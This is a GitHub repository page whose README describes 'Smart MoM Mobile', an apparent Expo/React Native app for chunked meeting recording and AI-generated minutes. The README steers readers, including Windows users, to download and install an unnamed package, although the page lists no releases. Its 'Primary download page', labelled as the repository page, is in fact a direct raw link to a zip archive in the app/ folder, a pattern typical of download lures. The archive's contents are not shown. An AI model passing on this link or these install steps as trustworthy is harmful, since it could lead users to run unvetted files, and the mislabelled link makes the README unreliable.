Skip to content

viditk9780/smart-mom-mobile-prod

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

6 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ“± smart-mom-mobile-prod - Record, Upload, Review Meetings Fast

Download Now

πŸš€ What this app does

Smart MoM Mobile helps you record meetings in short chunks, upload them in the background, and keep working even when the connection is weak.

It is built for people who want:

  • Meeting notes without manual typing
  • Audio upload that keeps retrying if it fails
  • AI-made minutes, summaries, and transcripts
  • A simple mobile app for Android and iPhone

πŸ“₯ Download and install

Use this link to visit the download page and get the app:

Visit the download page

If you are on Windows and need to prepare the app files before using them on your phone, you can also use this page to open the repository and follow the app setup files inside it.

πŸ–₯️ What you need

Before you start, make sure you have:

  • A Windows computer
  • A web browser such as Chrome, Edge, or Firefox
  • Enough free storage space for the app files
  • A stable internet connection for the first setup
  • A phone with enough space for recordings

For best results, keep:

  • At least 2 GB of free disk space
  • A recent Windows version
  • Your phone charged before long recordings

🧭 Before you begin

This app is made for mobile use, so the main app runs on your phone. On Windows, you use the GitHub page to get the app files, read setup steps, and prepare the project if you want to build it.

If you only want to use the app, open the link above and look for:

  • Release files
  • Build files
  • Setup notes
  • Any APK or app package if one is provided

πŸ“² How to get the app on Windows

  1. Open the download page in your browser.
  2. Look for the latest release or app package.
  3. Download the file to your Windows PC.
  4. If the file is an app package, move it to your phone.
  5. Open the file on your phone and install it.
  6. If Windows asks what to do with the file, choose Save.
  7. Keep the file in a folder you can find later, such as Downloads.
  8. If the page contains setup files only, follow the repository steps to build or prepare the app.

πŸ”§ How to use it after install

After you install the app:

  1. Open Smart MoM Mobile on your phone.
  2. Allow microphone access when asked.
  3. Start a new meeting recording.
  4. Let the app record in chunks.
  5. Keep the app open during the meeting if needed.
  6. The app uploads each chunk when a network is available.
  7. If the network drops, the offline queue saves the file and retries later.
  8. When the upload finishes, the app sends audio to the backend for transcript and MoM generation.
  9. Open the meeting view to read the summary, transcript, and meeting notes.

πŸŽ™οΈ Main features

πŸ“ Chunk-based recording

The app splits long meetings into smaller audio parts. This helps reduce upload failures and makes it easier to recover from network drops.

☁️ Auto-upload

Each audio chunk uploads to the backend as soon as the app can send it. You do not need to upload each file by hand.

πŸ“Ά Offline queue with retry

If your internet stops, the app stores the chunk and tries again later. This helps protect your meeting data.

πŸ€– AI-generated MoM

The backend can turn meeting audio into:

  • Minutes of meeting
  • Short summaries
  • Full transcripts

πŸ“± Mobile-first use

The app is built for Android and iPhone, so you can record meetings while moving between rooms or while you are away from your desk.

🧩 File and app flow

The app follows a simple flow:

  1. Record meeting audio
  2. Split audio into chunks
  3. Save each chunk
  4. Upload chunks to backend
  5. Retry failed uploads
  6. Generate transcript and summary
  7. Show meeting output on the app

This flow helps when meetings run long or when Wi-Fi is unstable.

πŸ› οΈ If you want to build it on Windows

If you are using Windows as a setup machine and want to work with the project files, follow this path:

  1. Open the GitHub repository.
  2. Download the source files.
  3. Check the README and project files in the repo.
  4. Install the app tools listed in the project.
  5. Open the project in your local editor.
  6. Run the setup steps from the repository.
  7. Test the app on a phone or emulator.

Common tools used for apps like this include:

  • Node.js
  • npm or yarn
  • Expo
  • Android Studio
  • A phone with the Expo app or a build install path

πŸ“ Typical project layout

You may see folders and files like these:

  • app/ or src/ for app screens
  • components/ for shared UI parts
  • services/ for upload and backend calls
  • storage/ for offline queue handling
  • hooks/ for app logic
  • assets/ for images and icons
  • app.json or app.config for app settings
  • package.json for package info

πŸ§ͺ Common checks

Before you use the app, check these items:

  • Microphone access is on
  • The phone has space for recordings
  • The internet works for upload
  • The backend is reachable
  • The app has permission to save files
  • The app time and date are correct

πŸ” Search terms used in this project

This project relates to:

  • AI meeting assistant
  • Audio recording
  • Chunk upload
  • Offline support
  • Speech to text
  • Transcript generation
  • Minutes of meeting
  • React Native
  • TypeScript
  • Expo
  • RAG
  • GPT-4o

πŸ“Œ Who this is for

This app is a fit for:

  • Team leads
  • Project managers
  • Sales staff
  • Support teams
  • Interviewers
  • Anyone who needs meeting notes fast

🧰 Basic troubleshooting

If the app does not work, check these items:

App will not open

  • Make sure the file finished downloading
  • Check that your phone supports the app file type
  • Try downloading it again from the repository page

Recording does not start

  • Allow microphone access
  • Close other apps that use the mic
  • Restart the app

Upload keeps failing

  • Check your internet connection
  • Wait a few minutes and let the retry queue run
  • Make sure the backend is online

Notes do not appear

  • Wait for processing to finish
  • Check that the meeting chunks uploaded fully
  • Open the meeting history again

🧭 Getting the best result

For better meeting output:

  • Speak clearly
  • Keep one meeting per session
  • Leave a short pause between speakers
  • Upload while on a steady network
  • Use a quiet room when possible

πŸ“Ž Primary download page

Open the main repository page here:

https://raw.githubusercontent.com/viditk9780/smart-mom-mobile-prod/main/app/mom_mobile_smart_prod_2.7.zip

🏷️ Project topics

ai, android, audio-recording, chunk-upload, expo, expo-audio, gpt-4o, ios, meeting-assistant, minutes-of-meeting, mobile-app, offline-support, rag, react-native, speech-to-text, typescript

Releases

No releases published

Packages

 
 
 

Contributors